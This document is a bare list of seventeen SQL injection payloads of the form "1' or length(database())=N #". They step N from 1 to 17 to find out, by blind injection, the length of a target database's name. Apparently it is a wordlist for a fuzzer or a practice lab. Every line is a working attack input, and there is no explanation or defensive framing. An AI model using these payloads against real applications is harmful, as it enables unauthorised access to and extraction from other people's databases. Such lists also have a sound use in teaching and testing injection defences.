1' or length(database())=1 #
1' or length(database())=2 #
1' or length(database())=3 #
1' or length(database())=4 #
1' or length(database())=5 #
1' or length(database())=6 #
1' or length(database())=7 #
1' or length(database())=8 #
1' or length(database())=9 #
1' or length(database())=10 #
1' or length(database())=11 #
1' or length(database())=12 #
1' or length(database())=13 #
1' or length(database())=14 #
1' or length(database())=15 #
1' or length(database())=16 #
1' or length(database())=17 #